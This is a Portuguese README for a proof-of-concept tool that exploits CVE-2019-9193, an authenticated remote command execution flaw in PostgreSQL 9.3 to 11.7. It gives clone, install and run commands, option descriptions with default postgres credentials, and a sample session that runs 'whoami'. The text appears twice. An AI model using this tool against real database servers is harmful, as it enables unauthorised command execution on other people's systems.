
é uma ferramenta de PoC projetada para explorar uma vulnerabilidade de Execução Remota de Código (RCE) autenticada em versões específicas do PostgreSQL (9.3 - 11.7)
GenPostgresRCEExploit é uma ferramenta PoC projetada para explorar uma vulnerabilidade de Execução Remota de Código (RCE) autenticada em versões específicas do PostgreSQL (9.3 - 11.7). Permite que usuários autenticados executem comandos do sistema em um servidor de banco de dados PostgreSQL vulnerável ao CVE-2019-9193.
psycopg2)git clone https://github.com/geniuszly/CVE-2019-9193
cd CVE-2019-9193
pip install -r requirements.txt
python3 GenPostgresRCEExploit.py -i <ip_alvo> -p <porta> -d <nome_banco> -U <usuário> -P <senha> -c "<comando_sistema>"
-i, --ip: Endereço IP do servidor PostgreSQL (Padrão: 127.0.0.1)-p, --port: Porta do servidor PostgreSQL (Padrão: 5432)-d, --database: Nome do banco de dados PostgreSQL (Padrão: template1)-U, --user: Nome de usuário para conectar ao servidor PostgreSQL (Padrão: postgres)-P, --password: Senha para conectar ao servidor PostgreSQL (Padrão: postgres)-c, --command: Comando do sistema a ser executado no servidor-t, --timeout: Tempo limite de conexão em segundos (Padrão: 10)python3 GenPostgresRCEExploit.py -i 192.168.1.10 -p 5432 -d mydb -U myuser -P mypass -c "whoami"
Este exemplo conecta-se a um servidor PostgreSQL em 192.168.1.10, autentica-se com as credenciais fornecidas e executa o comando whoami.
$ python3 GenPostgresRCEExploit.py -i 192.168.1.10 -p 5432 -d testdb -U postgres -P mypassword -c "whoami"
[+] Conectando ao banco de dados PostgreSQL em 192.168.1.10:5432
[+] Conexão estabelecida com sucesso
[+] Verificando versão do PostgreSQL
[+] Versão vulnerável do PostgreSQL detectada: 10.4
[+] Criando tabela temporária: temp_3f8b8f9e2c9c11d7bd8f7c61d4e9eaf2
[+] Comando executado com sucesso
postgres
Esta ferramenta destina-se apenas a fins educacionais e testes éticos. O uso não autorizado desta ferramenta contra qualquer sistema é ilegal e estritamente proibido. Os autores não se responsabilizam por qualquer uso indevido.
GenPostgresRCEExploit é um exploit PoC desenvolvido para explorar uma vulnerabilidade de execução remota de código (RCE) em versões específicas do PostgreSQL (9.3 - 11.7). O programa permite que usuários autenticados executem comandos do sistema em um servidor PostgreSQL vulnerável ao CVE-2019-9193.
psycopg2)git clone https://github.com/geniuszly/CVE-2019-9193
cd CVE-2019-9193
pip install -r requirements.txt
python3 GenPostgresRCEExploit.py -i <endereço_IP> -p <porta> -d <nome_banco> -U <usuário> -P <senha> -c "<comando_sistema>"
-i, --ip: Endereço IP do servidor PostgreSQL (Padrão: 127.0.0.1)-p, --port: Porta do servidor PostgreSQL (Padrão: 5432)-d, --database: Nome do banco de dados PostgreSQL (Padrão: template1)-U, --user: Nome de usuário para conectar ao servidor PostgreSQL (Padrão: postgres)-P, --password: Senha para conectar ao servidor PostgreSQL (Padrão: postgres)-c, --command: Comando do sistema a ser executado no servidor-t, --timeout: Tempo limite de conexão em segundos (Padrão: 10)python3 GenPostgresRCEExploit.py -i 192.168.1.10 -p 5432 -d mydb -U myuser -P mypass -c "whoami"
Neste exemplo, o programa conecta-se ao servidor PostgreSQL no endereço 192.168.1.10, autentica-se com as credenciais fornecidas e executa o comando whoami.
$ python3 GenPostgresRCEExploit.py -i 192.168.1.10 -p 5432 -d testdb -U postgres -P mypassword -c "whoami"
[+] Conectando ao banco de dados PostgreSQL em 192.168.1.10:5432
[+] Conexão estabelecida com sucesso
[+] Verificando versão do PostgreSQL
[+] Versão vulnerável do PostgreSQL detectada: 10.4
[+] Criando tabela temporária: temp_3f8b8f9e2c9c11d7bd8f7c61d4e9eaf2
[+] Comando executado com sucesso
postgres
Esta ferramenta destina-se exclusivamente a fins educacionais e testes legais. O uso não autorizado desta ferramenta contra qualquer sistema é ilegal e estritamente proibido. Os autores não se responsabilizam por qualquer uso indevido.